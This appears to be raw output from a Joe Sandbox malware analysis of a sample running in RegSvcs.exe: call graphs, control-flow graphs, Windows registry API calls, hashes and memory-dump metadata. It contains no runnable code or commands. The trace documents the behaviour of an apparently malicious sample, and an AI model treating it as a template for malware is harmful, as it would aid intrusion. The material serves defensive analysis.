34431 3f7b87 34196->34431 34439 3f750b 34196->34439 34452 3f758c 34196->34452 34465 3f7616 34196->34465 34478 3f7c17 34196->34478 34486 3f76a0 34196->34486 34499 3f7721 34196->34499 34509 3f79a4 34196->34509 34517 3f7ca7 34196->34517 34525 3f7d2b 34196->34525 34533 3f77ab 34196->34533 34543 3f7a2e 34196->34543 34551 3f7835 34196->34551 34561 3f7ab8 34196->34561 34569 3f7dbb 34196->34569 34577 3f7e3f 34196->34577 34235 3f78d0 34234->34235 34236 3f796d KiUserExceptionDispatcher 34235->34236 34237 3f7989 34236->34237 34582 c2aff0 34237->34582 34586 c2af9c 34237->34586 34238 3f7e24 34240 c2aff0 RegQueryValueExW 34238->34240 34241 c2af9c RegQueryValueExW 34238->34241 34239 3f7e6c 34239->34197 34240->34239 34241->34239 34245 3f7b53 34244->34245 34248 c2aff0 RegQueryValueExW 34245->34248 34249 c2af9c RegQueryValueExW 34245->34249 34246 3f7e24 34250 c2aff0 RegQueryValueExW 34246->34250 34251 c2af9c RegQueryValueExW 34246->34251 34247 3f7e6c 34247->34197 34248->34246 34249->34246 34250->34247 34251->34247 34253 3f795a KiUserExceptionDispatcher 34252->34253 34255 3f7989 34253->34255 34258 c2aff0 RegQueryValueExW 34255->34258 34259 c2af9c RegQueryValueExW 34255->34259 34256 3f7e24 34260 c2aff0 RegQueryValueExW 34256->34260 34261 c2af9c RegQueryValueExW 34256->34261 34257 3f7e6c 34257->34197 34258->34256 34259->34256 34260->34257 34261->34257 34263 3f7be0 34262->34263 34268 c2aff0 RegQueryValueExW 34263->34268 34269 c2af9c RegQueryValueExW 34263->34269 34264 3f7e24 34266 c2aff0 RegQueryValueExW 34264->34266 34267 c2af9c RegQueryValueExW 34264->34267 34265 3f7e6c 34265->34197 34266->34265 34267->34265 34268->34264 34269->34264 34271 3f7561 34270->34271 34593 c23050 34271->34593 34598 c22ff0 34271->34598 34272 3f7706 34273 3f796d KiUserExceptionDispatcher 34272->34273 34274 3f7989 34273->34274 34279 c2aff0 RegQueryValueExW 34274->34279 34280 c2af9c RegQueryValueExW 34274->34280 34275 3f7e24 34281 c2aff0 RegQueryValueExW 34275->34281 34282 c2af9c RegQueryValueExW 34275->34282 34276 3f7e6c 34276->34197 34279->34275 34280->34275 34281->34276 34282->34276 34284 3f75e2 34283->34284 34290 c23050 2 API calls 34284->34290 34291 c22ff0 2 API calls 34284->34291 34285 3f7706 34286 3f796d KiUserExceptionDispatcher 34285->34286 34287 3f7989 34286->34287 34292 c2aff0 RegQueryValueExW 34287->34292 34293 c2af9c RegQueryValueExW 34287->34293 34288 3f7e24 34294 c2aff0 RegQueryValueExW 34288->34294 34295 c2af9c RegQueryValueExW 34288->34295 34289 3f7e6c 34289->34197 34290->34285 34291->34285 34292->34288 34293->34288 34294->34289 34295->34289 34297 3f766c 34296->34297 34305 c23050 2 API calls 34297->34305 34306 c22ff0 2 API calls 34297->34306 34298 3f7706 34299 3f796d KiUserExceptionDispatcher 34298->34299 34300 3f7989 34299->34300 34307 c2aff0 RegQueryValueExW 34300->34307 34308 c2af9c RegQueryValueExW 34300->34308 34301 3f7e24 34303 c2aff0 RegQueryValueExW 34301->34303 34304 c2af9c RegQueryValueExW 34301->34304 34302 3f7e6c 34302->34197 34303->34302 34304->34302 34305->34298 34306->34298 34307->34301 34308->34301 34310 3f7c70 34309->34310 34313 c2aff0 RegQueryValueExW 34310->34313 34314 c2af9c RegQueryValueExW 34310->34314 34311 3f7e24 34315 c2aff0 RegQueryValueExW 34311->34315 34316 c2af9c RegQueryValueExW 34311->34316 34312 3f7e6c 34312->34197 34313->34311 34314->34311 34315->34312 34316->34312 34318 3f7cf4 34317->34318 34321 c2aff0 RegQueryValueExW 34318->34321 34322 c2af9c RegQueryValueExW 34318->34322 34319 3f7e24 34323 c2aff0 RegQueryValueExW 34319->34323 34324 c2af9c RegQueryValueExW 34319->34324 34320 3f7e6c 34320->34197 34321->34319 34322->34319 34323->34320 34324->34320 34326 3f76f6 34325->34326 34332 c23050 2 API calls 34326->34332 34333 c22ff0 2 API calls 34326->34333 34327 3f7706 34328 3f796d KiUserExceptionDispatcher 34327->34328 34329 3f7989 34328->34329 34334 c2aff0 RegQueryValueExW 34329->34334 34335 c2af9c RegQueryValueExW 34329->34335 34330 3f7e24 34336 c2aff0 RegQueryValueExW 34330->34336 34337 c2af9c RegQueryValueExW 34330->34337 34331 3f7e6c 34331->34197 34332->34327 34333->34327 34334->34330 34335->34330 34336->34331 34337->34331 34339 3f7777 34338->34339 34340 3f796d KiUserExceptionDispatcher 34339->34340 34341 3f7989 34340->34341 34344 c2aff0 RegQueryValueExW 34341->34344 34345 c2af9c RegQueryValueExW 34341->34345 34342 3f7e24 34346 c2aff0 RegQueryValueExW 34342->34346 34347 c2af9c RegQueryValueExW 34342->34347 34343 3f7e6c 34343->34197 34344->34342 34345->34342 34346->34343 34347->34343 34349 3f79fa 34348->34349 34352 c2aff0 RegQueryValueExW 34349->34352 34353 c2af9c RegQueryValueExW 34349->34353 34350 3f7e24 34354 c2aff0 RegQueryValueExW 34350->34354 34355 c2af9c RegQueryValueExW 34350->34355 34351 3f7e6c 34351->34197 34352->34350 34353->34350 34354->34351 34355->34351 34357 3f7509 34356->34357 34363 c23050 2 API calls 34357->34363 34364 c22ff0 2 API calls 34357->34364 34358 3f7706 34359 3f796d KiUserExceptionDispatcher 34358->34359 34360 3f7989 34359->34360 34365 c2aff0 RegQueryValueExW 34360->34365 34366 c2af9c RegQueryValueExW 34360->34366 34361 3f7e24 34367 c2aff0 RegQueryValueExW 34361->34367 34368 c2af9c RegQueryValueExW 34361->34368 34362 3f7e6c 34362->34197 34363->34358 34364->34358 34365->34361 34366->34361 34367->34362 34368->34362 34370 3f7801 34369->34370 34371 3f796d KiUserExceptionDispatcher 34370->34371 34372 3f7989 34371->34372 34375 c2aff0 RegQueryValueExW 34372->34375 34376 c2af9c RegQueryValueExW 34372->34376 34373 3f7e24 34377 c2aff0 RegQueryValueExW 34373->34377 34378 c2af9c RegQueryValueExW 34373->34378 34374 3f7e6c 34374->34197 34375->34373 34376->34373 34377->34374 34378->34374 34380 3f7d84 34379->34380 34383 c2aff0 RegQueryValueExW 34380->34383 34384 c2af9c RegQueryValueExW 34380->34384 34381 3f7e24 34385 c2aff0 RegQueryValueExW 34381->34385 34386 c2af9c RegQueryValueExW 34381->34386 34382 3f7e6c 34382->34197 34383->34381 34384->34381 34385->34382 34386->34382 34388 3f7a84 34387->34388 34391 c2aff0 RegQueryValueExW 34388->34391 34392 c2af9c RegQueryValueExW 34388->34392 34389 3f7e24 34393 c2aff0 RegQueryValueExW 34389->34393 34394 c2af9c RegQueryValueExW 34389->34394 34390 3f7e6c 34390->34197 34391->34389 34392->34389 34393->34390 34394->34390 34396 3f7e08 34395->34396 34399 c2aff0 RegQueryValueExW 34396->34399 34400 c2af9c RegQueryValueExW 34396->34400 34397 3f7e24 34401 c2aff0 RegQueryValueExW 34397->34401 34402 c2af9c RegQueryValueExW 34397->34402 34398 3f7e6c 34398->34197 34399->34397 34400->34397 34401->34398 34402->34398 34404 3f788b 34403->34404 34405 3f796d KiUserExceptionDispatcher 34404->34405 34406 3f7989 34405->34406 34409 c2aff0 RegQueryValueExW 34406->34409 34410 c2af9c RegQueryValueExW 34406->34410 34407 3f7e24 34411 c2aff0 RegQueryValueExW 34407->34411 34412 c2af9c RegQueryValueExW 34407->34412 34408 3f7e6c 34408->34197 34409->34407 34410->34407 34411->34408 34412->34408 34414 3f7b0e 34413->34414 34417 c2aff0 RegQueryValueExW 34414->34417 34418 c2af9c RegQueryValueExW 34414->34418 34415 3f7e24 34419 c2aff0 RegQueryValueExW 34415->34419 34420 c2af9c RegQueryValueExW 34415->34420 34416 3f7e6c 34416->34197 34417->34415 34418->34415 34419->34416 34420->34416 34422 3f7915 34421->34422 34423 3f796d KiUserExceptionDispatcher 34422->34423 34424 3f7989 34423->34424 34427 c2aff0 RegQueryValueExW 34424->34427 34428 c2af9c RegQueryValueExW 34424->34428 34425 3f7e24 34429 c2aff0 RegQueryValueExW 34425->34429 34430 c2af9c RegQueryValueExW 34425->34430 34426 3f7e6c 34426->34197 34427->34425 34428->34425 34429->34426 34430->34426 34432 3f7b98 34431->34432 34435 c2aff0 RegQueryValueExW 34432->34435 34436 c2af9c RegQueryValueExW 34432->34436 34433 3f7e24 34437 c2aff0 RegQueryValueExW 34433->34437 34438 c2af9c RegQueryValueExW 34433->34438 34434 3f7e6c 34434->34197 34435->34433 34436->34433 34437->34434 34438->34434 34440 3f751c 34439->34440 34446 c23050 2 API calls 34440->34446 34447 c22ff0 2 API calls 34440->34447 34441 3f7706 34442 3f796d KiUserExceptionDispatcher 34441->34442 34443 3f7989 34442->34443 34448 c2aff0 RegQueryValueExW 34443->34448 34449 c2af9c RegQueryValueExW 34443->34449 34444 3f7e24 34450 c2aff0 RegQueryValueExW 34444->34450 34451 c2af9c RegQueryValueExW 34444->34451 34445 3f7e6c 34445->34197 34446->34441 34447->34441 34448->34444 34449->34444 34450->34445 34451->34445 34453 3f759d 34452->34453 34459 c23050 2 API calls 34453->34459 34460 c22ff0 2 API calls 34453->34460 34454 3f7706 34455 3f796d KiUserExceptionDispatcher 34454->34455 34456 3f7989 34455->34456 34461 c2aff0 RegQueryValueExW 34456->34461 34462 c2af9c RegQueryValueExW 34456->34462 34457 3f7e24 34463 c2aff0 RegQueryValueExW 34457->34463 34464 c2af9c RegQueryValueExW 34457->34464 34458 3f7e6c 34458->34197 34459->34454 34460->34454 34461->34457 34462->34457 34463->34458 34464->34458 34466 3f7627 34465->34466 34472 c23050 2 API calls 34466->34472 34473 c22ff0 2 API calls 34466->34473 34467 3f7706 34468 3f796d KiUserExceptionDispatcher 34467->34468 34469 3f7989 34468->34469 34474 c2aff0 RegQueryValueExW 34469->34474 34475 c2af9c RegQueryValueExW 34469->34475 34470 3f7e24 34476 c2aff0 RegQueryValueExW 34470->34476 34477 c2af9c RegQueryValueExW 34470->34477 34471 3f7e6c 34471->34197 34472->34467 34473->34467 34474->34470 34475->34470 34476->34471 34477->34471 34479 3f7c28 34478->34479 34482 c2aff0 RegQueryValueExW 34479->34482 34483 c2af9c RegQueryValueExW 34479->34483 34480 3f7e24 34484 c2aff0 RegQueryValueExW 34480->34484 34485 c2af9c RegQueryValueExW 34480->34485 34481 3f7e6c 34481->34197 34482->34480 34483->34480 34484->34481 34485->34481 34487 3f76b1 34486->34487 34493 c23050 2 API calls 34487->34493 34494 c22ff0 2 API calls 34487->34494 34488 3f7706 34489 3f796d KiUserExceptionDispatcher 34488->34489 34490 3f7989 34489->34490 34495 c2aff0 RegQueryValueExW 34490->34495 34496 c2af9c RegQueryValueExW 34490->34496 34491 3f7e24 34497 c2aff0 RegQueryValueExW 34491->34497 34498 c2af9c RegQueryValueExW 34491->34498 34492 3f7e6c 34492->34197 34493->34488 34494->34488 34495->34491 34496->34491 34497->34492 34498->34492 34500 3f7732 34499->34500 34501 3f796d KiUserExceptionDispatcher 34500->34501 34502 3f7989 34501->34502 34507 c2aff0 RegQueryValueExW 34502->34507 34508 c2af9c RegQueryValueExW 34502->34508 34503 3f7e24 34505 c2aff0 RegQueryValueExW 34503->34505 34506 c2af9c RegQueryValueExW 34503->34506 34504 3f7e6c 34504->34197 34505->34504 34506->34504 34507->34503 34508->34503 34510 3f79b5 34509->34510 34513 c2aff0 RegQueryValueExW 34510->34513 34514 c2af9c RegQueryValueExW 34510->34514 34511 3f7e24 34515 c2aff0 RegQueryValueExW 34511->34515 34516 c2af9c RegQueryValueExW 34511->34516 34512 3f7e6c 34512->34197 34513->34511 34514->34511 34515->34512 34516->34512 34518 3f7cb8 34517->34518 34521 c2aff0 RegQueryValueExW 34518->34521 34522 c2af9c RegQueryValueExW 34518->34522 34519 3f7e24 34523 c2aff0 RegQueryValueExW 34519->34523 34524 c2af9c RegQueryValueExW 34519->34524 34520 3f7e6c 34520->34197 34521->34519 34522->34519 34523->34520 34524->34520 34526 3f7d3c 34525->34526 34529 c2aff0 RegQueryValueExW 34526->34529 34530 c2af9c RegQueryValueExW 34526->34530 34527 3f7e24 34531 c2aff0 RegQueryValueExW 34527->34531 34532 c2af9c RegQueryValueExW 34527->34532 34528 3f7e6c 34528->34197 34529->34527 34530->34527 34531->34528 34532->34528 34534 3f77bc 34533->34534 34535 3f796d KiUserExceptionDispatcher 34534->34535 34536 3f7989 34535->34536 34541 c2aff0 RegQueryValueExW 34536->34541 34542 c2af9c RegQueryValueExW 34536->34542 34537 3f7e24 34539 c2aff0 RegQueryValueExW 34537->34539 34540 c2af9c RegQueryValueExW 34537->34540 34538 3f7e6c 34538->34197 34539->34538 34540->34538 34541->34537 34542->34537 34544 3f7a3f 34543->34544 34549 c2aff0 RegQueryValueExW 34544->34549 34550 c2af9c RegQueryValueExW 34544->34550 34545 3f7e24 34547 c2aff0 RegQueryValueExW 34545->34547 34548 c2af9c RegQueryValueExW 34545->34548 34546 3f7e6c 34546->34197 34547->34546 34548->34546 34549->34545 34550->34545 34552 3f7846 34551->34552 34553 3f796d KiUserExceptionDispatcher 34552->34553 34554 3f7989 34553->34554 34557 c2aff0 RegQueryValueExW 34554->34557 34558 c2af9c RegQueryValueExW 34554->34558 34555 3f7e24 34559 c2aff0 RegQueryValueExW 34555->34559 34560 c2af9c RegQueryValueExW 34555->34560 34556 3f7e6c 34556->34197 34557->34555 34558->34555 34559->34556 34560->34556 34562 3f7ac9 34561->34562 34565 c2aff0 RegQueryValueExW 34562->34565 34566 c2af9c RegQueryValueExW 34562->34566 34563 3f7e24 34567 c2aff0 RegQueryValueExW 34563->34567 34568 c2af9c RegQueryValueExW 34563->34568 34564 3f7e6c 34564->34197 34565->34563 34566->34563 34567->34564 34568->34564 34570 3f7dcc 34569->34570 34575 c2aff0 RegQueryValueExW 34570->34575 34576 c2af9c RegQueryValueExW 34570->34576 34571 3f7e24 34573 c2aff0 RegQueryValueExW 34571->34573 34574 c2af9c RegQueryValueExW 34571->34574 34572 3f7e6c 34572->34197 34573->34572 34574->34572 34575->34571 34576->34571 34578 3f7e50 34577->34578 34580 c2aff0 RegQueryValueExW 34578->34580 34581 c2af9c RegQueryValueExW 34578->34581 34579 3f7e6c 34579->34197 34580->34579 34581->34579 34583 c2b00b 34582->34583 34585 c2b3f0 34583->34585 34591 c235c8 RegQueryValueExW 34583->34591 34585->34238 34587 c2afb1 34586->34587 34589 c2afd4 34586->34589 34587->34238 34590 c2b3f0 34589->34590 34592 c235c8 RegQueryValueExW 34589->34592 34590->34238 34591->34583 34592->34589 34597 c2306f 34593->34597 34594 c232d7 34594->34272 34596 c20c14 RegQueryValueExW 34596->34597 34597->34594 34597->34596 34604 c20c08 34597->34604 34599 c23011 34598->34599 34603 c23034 34598->34603 34599->34272 34600 c20c08 RegOpenKeyExW 34600->34603 34601 c20c14 RegQueryValueExW 34601->34603 34602 c232d7 34602->34272 34603->34600 34603->34601 34603->34602 34605 c23360 RegOpenKeyExW 34604->34605 34607 c23426 34605->34607 34608 20914d0 34609 20914e1 34608->34609 34610 2091504 34608->34610 34611 2091531 34610->34611 34614 2091a81 34610->34614 34612 209176b 34615 2091a99 34614->34615 34616 2091b72 34615->34616 34619 2093d89 34615->34619 34623 2093d98 34615->34623 34616->34612 34620 2093db2 34619->34620 34627 20940e9 34620->34627 34621 2093dd8 34624 2093db2 34623->34624 34626 20940e9 3 API calls 34624->34626 34625 2093dd8 34626->34625 34628 209424f 34627->34628 34632 2094115 34627->34632 34629 20942bc 34628->34629 34634 2094330 34628->34634 34638 20940e9 3 API calls 34629->34638 34640 20942a0 3 API calls 34629->34640 34652 2094358 34629->34652 34630 2094245 34630->34621 34631 2094207 34631->34628 34631->34630 34642 20940e9 3 API calls 34631->34642 34632->34628 34632->34631 34636 20940e9 3 API calls 34632->34636 34643 20942a0 34632->34643 34633 209431c 34633->34621 34656 20943af 34634->34656 34635 20943ab 34635->34621 34636->34632 34638->34633 34640->34633 34642->34631 34644 20942bc 34643->34644 34646 2094330 34643->34646 34649 20940e9 3 API calls 34644->34649 34650 2094358 3 API calls 34644->34650 34651 20942a0 3 API calls 34644->34651 34645 209431c 34645->34632 34648 20943af 3 API calls 34646->34648 34647 20943ab 34647->34632 34648->34647 34649->34645 34650->34645 34651->34645 34653 209436d 34652->34653 34655 20943af 3 API calls 34653->34655 34654 20943ab 34654->34633 34655->34654 34657 20943ba 34656->34657 34658 20944b8 34657->34658 34660 209450d 34657->34660 34663 20943af 3 API calls 34657->34663 34658->34660 34664 2094da8 34658->34664 34672 2094c30 34658->34672 34659 20944e0 34659->34635 34660->34635 34663->34658 34668 2094d38 34664->34668 34665 20950ed 34665->34659 34666 2094c30 2 API calls 34666->34668 34667 20952a0 GetAppCompatFlags2 GetAppCompatFlags2 34667->34668 34668->34665 34668->34666 34668->34667 34669 2095a52 34668->34669 34670 2095fad 34669->34670 34671 2095dd1 GetAppCompatFlags2 34669->34671 34670->34659 34671->34669 34674 2094c3b 34672->34674 34673 2094c30 GetAppCompatFlags2 34673->34674 34674->34673 34675 20952a0 GetAppCompatFlags2 34674->34675 34676 2094cf3 34674->34676 34677 2095a52 34674->34677 34675->34674 34676->34659 34678 2095dd1 GetAppCompatFlags2 34677->34678 34679 2095fad 34677->34679 34678->34677 34679->34659
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1192579326.0000000002090000.00000040.00000800.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_2090000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: K$P
                                                                                          • API String ID: 0-420285281
                                                                                          • Opcode ID: 5b10711781f77d7c82472fb6117d544981a828c34c3a6590cc6f3f102616e5e8
                                                                                          • Instruction ID: 33950ee03af95e3e8226f1a685cbe4a6c290f05590c11a3aa466541b717abb53
                                                                                          • Opcode Fuzzy Hash: 5b10711781f77d7c82472fb6117d544981a828c34c3a6590cc6f3f102616e5e8
                                                                                          • Instruction Fuzzy Hash: 88D28C74B002008FDF62CB29C894B6EBBF2EB49314F60856AE556DB7A1C731EC45EB51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1630 3f74ea-3f75f5 KiUserExceptionDispatcher call 3fb070 1797 3f75f5 call 3fb71d 1630->1797 1798 3f75f5 call 3fba08 1630->1798 1799 3f75f5 call 3fba68 1630->1799 1800 3f75f5 call 3fb967 1630->1800 1801 3f75f5 call 3fb720 1630->1801 1642 3f75fb-3f767f call 3fc790 1813 3f767f call c22d02 1642->1813 1814 3f767f call c22d10 1642->1814 1815 3f767f call c22d6f 1642->1815 1648 3f7685-3f7700 call c22ec8 1827 3f7700 call c23050 1648->1827 1828 3f7700 call c22ff0 1648->1828 1654 3f7706-3f7745 1839 3f7745 call c23857 1654->1839 1840 3f7745 call c237f8 1654->1840 1841 3f7745 call c23748 1654->1841 1657 3f774b-3f778a 1844 3f778a call c23977 1657->1844 1845 3f778a call c238b8 1657->1845 1846 3f778a call c23918 1657->1846 1660 3f7790-3f77cf 1774 3f77cf call c239d8 1660->1774 1775 3f77cf call c23a38 1660->1775 1663 3f77d5-3f789e 1782 3f789e call c24390 1663->1782 1783 3f789e call c2432e 1663->1783 1672 3f78a4-3f7928 1789 3f7928 call c24820 1672->1789 1790 3f7928 call c24830 1672->1790 1791 3f7928 call c24927 1672->1791 1792 3f7928 call c248c8 1672->1792 1678 3f792e-3f79c8 KiUserExceptionDispatcher 1806 3f79c8 call c24da0 1678->1806 1807 3f79c8 call c24e68 1678->1807 1684 3f79ce-3f7a0d 1816 3f7a0d call c24f88 1684->1816 1817 3f7a0d call c24f29 1684->1817 1687 3f7a13-3f7a97 1829 3f7a97 call c25490 1687->1829 1830 3f7a97 call c252e8 1687->1830 1831 3f7a97 call c25348 1687->1831 1832 3f7a97 call c25758 1687->1832 1833 3f7a97 call c25659 1687->1833 1693 3f7a9d-3f7b21 1847 3f7b21 call c265d0 1693->1847 1848 3f7b21 call c265c8 1693->1848 1699 3f7b27-3f7bf6 1778 3f7bf6 call c27958 1699->1778 1779 3f7bf6 call c27aa8 1699->1779 1708 3f7bfc-3f7c3e 1784 3f7c3e call c27d98 1708->1784 1785 3f7c3e call c27da8 1708->1785 1711 3f7c44-3f7cc2 1793 3f7cc2 call c29760 1711->1793 1794 3f7cc2 call c297b8 1711->1794 1717 3f7cc8-3f7d52 call c29a40 1808 3f7d52 call c2a320 1717->1808 1809 3f7d52 call c2a330 1717->1809 1810 3f7d52 call c29d88 1717->1810 1811 3f7d52 call c29e6c 1717->1811 1812 3f7d52 call c29e1c 1717->1812 1723 3f7d58-3f7dd6 1819 3f7dd6 call c2aed0 1723->1819 1820 3f7dd6 call c2ae20 1723->1820 1729 3f7ddc-3f7e1e 1834 3f7e1e call c2aff0 1729->1834 1835 3f7e1e call c2af9c 1729->1835 1732 3f7e24-3f7e66 1842 3f7e66 call c2aff0 1732->1842 1843 3f7e66 call c2af9c 1732->1843 1735 3f7e6c-3f7f26 call c2b831 1776 3f7f26 call c2ce50 1735->1776 1777 3f7f26 call c2ce4c 1735->1777 1744 3f7f2c-3f7f6e 1780 3f7f6e call c2e238 1744->1780 1781 3f7f6e call c2dfa8 1744->1781 1747 3f7f74-3f7ffe 1787 3f7ffe call c2e5d0 1747->1787 1788 3f7ffe call c2e570 1747->1788 1753 3f8004-3f8046 1795 3f8046 call c2e9f8 1753->1795 1796 3f8046 call c2e998 1753->1796 1756 3f804c-3f808e 1803 3f808e call c2ef30 1756->1803 1804 3f808e call c2ecc1 1756->1804 1759 3f8094-3f815a 1821 3f815a call c2f6a0 1759->1821 1822 3f815a call c2f977 1759->1822 1823 3f815a call c2f198 1759->1823 1824 3f815a call c2f8b8 1759->1824 1825 3f815a call c2f918 1759->1825 1826 3f815a call c2f18e 1759->1826 1768 3f8160-3f81a2 1836 3f81a2 call c2fa97 1768->1836 1837 3f81a2 call c2f9d8 1768->1837 1838 3f81a2 call c2fa38 1768->1838 1771 3f81a8-3f81f7 1774->1663 1775->1663 1776->1744 1777->1744 1778->1708 1779->1708 1780->1747 1781->1747 1782->1672 1783->1672 1784->1711 1785->1711 1787->1753 1788->1753 1789->1678 1790->1678 1791->1678 1792->1678 1793->1717 1794->1717 1795->1756 1796->1756 1797->1642 1798->1642 1799->1642 1800->1642 1801->1642 1803->1759 1804->1759 1806->1684 1807->1684 1808->1723 1809->1723 1810->1723 1811->1723 1812->1723 1813->1648 1814->1648 1815->1648 1816->1687 1817->1687 1819->1729 1820->1729 1821->1768 1822->1768 1823->1768 1824->1768 1825->1768 1826->1768 1827->1654 1828->1654 1829->1693 1830->1693 1831->1693 1832->1693 1833->1693 1834->1732 1835->1732 1836->1771 1837->1771 1838->1771 1839->1657 1840->1657 1841->1657 1842->1735 1843->1735 1844->1660 1845->1660 1846->1660 1847->1699 1848->1699
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F74EA
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 19392fc16954bff2c1d05439393b2769daec504858f383d374e696c6f94b1585
                                                                                          • Instruction ID: 7f3820b7cd33a4ec1cc3e334490b1062c83b0b44a0f96c43d4084b361e9b1e9d
                                                                                          • Opcode Fuzzy Hash: 19392fc16954bff2c1d05439393b2769daec504858f383d374e696c6f94b1585
                                                                                          • Instruction Fuzzy Hash: 1A02B43490522CCFCB66DF28C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3656 3f750b-3f75f5 call 3fb070 3816 3f75f5 call 3fb71d 3656->3816 3817 3f75f5 call 3fba08 3656->3817 3818 3f75f5 call 3fba68 3656->3818 3819 3f75f5 call 3fb967 3656->3819 3820 3f75f5 call 3fb720 3656->3820 3669 3f75fb-3f767f call 3fc790 3832 3f767f call c22d02 3669->3832 3833 3f767f call c22d10 3669->3833 3834 3f767f call c22d6f 3669->3834 3675 3f7685-3f7700 call c22ec8 3846 3f7700 call c23050 3675->3846 3847 3f7700 call c22ff0 3675->3847 3681 3f7706-3f7745 3858 3f7745 call c23857 3681->3858 3859 3f7745 call c237f8 3681->3859 3860 3f7745 call c23748 3681->3860 3684 3f774b-3f778a 3863 3f778a call c23977 3684->3863 3864 3f778a call c238b8 3684->3864 3865 3f778a call c23918 3684->3865 3687 3f7790-3f77cf 3869 3f77cf call c239d8 3687->3869 3870 3f77cf call c23a38 3687->3870 3690 3f77d5-3f789e 3801 3f789e call c24390 3690->3801 3802 3f789e call c2432e 3690->3802 3699 3f78a4-3f7928 3808 3f7928 call c24820 3699->3808 3809 3f7928 call c24830 3699->3809 3810 3f7928 call c24927 3699->3810 3811 3f7928 call c248c8 3699->3811 3705 3f792e-3f79c8 KiUserExceptionDispatcher 3825 3f79c8 call c24da0 3705->3825 3826 3f79c8 call c24e68 3705->3826 3711 3f79ce-3f7a0d 3835 3f7a0d call c24f88 3711->3835 3836 3f7a0d call c24f29 3711->3836 3714 3f7a13-3f7a97 3848 3f7a97 call c25490 3714->3848 3849 3f7a97 call c252e8 3714->3849 3850 3f7a97 call c25348 3714->3850 3851 3f7a97 call c25758 3714->3851 3852 3f7a97 call c25659 3714->3852 3720 3f7a9d-3f7b21 3866 3f7b21 call c265d0 3720->3866 3867 3f7b21 call c265c8 3720->3867 3726 3f7b27-3f7bf6 3873 3f7bf6 call c27958 3726->3873 3874 3f7bf6 call c27aa8 3726->3874 3735 3f7bfc-3f7c3e 3803 3f7c3e call c27d98 3735->3803 3804 3f7c3e call c27da8 3735->3804 3738 3f7c44-3f7cc2 3812 3f7cc2 call c29760 3738->3812 3813 3f7cc2 call c297b8 3738->3813 3744 3f7cc8-3f7d52 call c29a40 3827 3f7d52 call c2a320 3744->3827 3828 3f7d52 call c2a330 3744->3828 3829 3f7d52 call c29d88 3744->3829 3830 3f7d52 call c29e6c 3744->3830 3831 3f7d52 call c29e1c 3744->3831 3750 3f7d58-3f7dd6 3838 3f7dd6 call c2aed0 3750->3838 3839 3f7dd6 call c2ae20 3750->3839 3756 3f7ddc-3f7e1e 3853 3f7e1e call c2aff0 3756->3853 3854 3f7e1e call c2af9c 3756->3854 3759 3f7e24-3f7e66 3861 3f7e66 call c2aff0 3759->3861 3862 3f7e66 call c2af9c 3759->3862 3762 3f7e6c-3f7f26 call c2b831 3871 3f7f26 call c2ce50 3762->3871 3872 3f7f26 call c2ce4c 3762->3872 3771 3f7f2c-3f7f6e 3875 3f7f6e call c2e238 3771->3875 3876 3f7f6e call c2dfa8 3771->3876 3774 3f7f74-3f7ffe 3806 3f7ffe call c2e5d0 3774->3806 3807 3f7ffe call c2e570 3774->3807 3780 3f8004-3f8046 3814 3f8046 call c2e9f8 3780->3814 3815 3f8046 call c2e998 3780->3815 3783 3f804c-3f808e 3822 3f808e call c2ef30 3783->3822 3823 3f808e call c2ecc1 3783->3823 3786 3f8094-3f815a 3840 3f815a call c2f6a0 3786->3840 3841 3f815a call c2f977 3786->3841 3842 3f815a call c2f198 3786->3842 3843 3f815a call c2f8b8 3786->3843 3844 3f815a call c2f918 3786->3844 3845 3f815a call c2f18e 3786->3845 3795 3f8160-3f81a2 3855 3f81a2 call c2fa97 3795->3855 3856 3f81a2 call c2f9d8 3795->3856 3857 3f81a2 call c2fa38 3795->3857 3798 3f81a8-3f81f7 3801->3699 3802->3699 3803->3738 3804->3738 3806->3780 3807->3780 3808->3705 3809->3705 3810->3705 3811->3705 3812->3744 3813->3744 3814->3783 3815->3783 3816->3669 3817->3669 3818->3669 3819->3669 3820->3669 3822->3786 3823->3786 3825->3711 3826->3711 3827->3750 3828->3750 3829->3750 3830->3750 3831->3750 3832->3675 3833->3675 3834->3675 3835->3714 3836->3714 3838->3756 3839->3756 3840->3795 3841->3795 3842->3795 3843->3795 3844->3795 3845->3795 3846->3681 3847->3681 3848->3720 3849->3720 3850->3720 3851->3720 3852->3720 3853->3759 3854->3759 3855->3798 3856->3798 3857->3798 3858->3684 3859->3684 3860->3684 3861->3762 3862->3762 3863->3687 3864->3687 3865->3687 3866->3726 3867->3726 3869->3690 3870->3690 3871->3771 3872->3771 3873->3735 3874->3735 3875->3774 3876->3774
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 19718c4ff86c16b620bc13e2ba4dc0f7f841de7ae31ad4204954b466063cb5b1
                                                                                          • Instruction ID: a2964a621a7e7dba3fa12815e6f12dd7c6516ce652fbe441cc5c96296db456c0
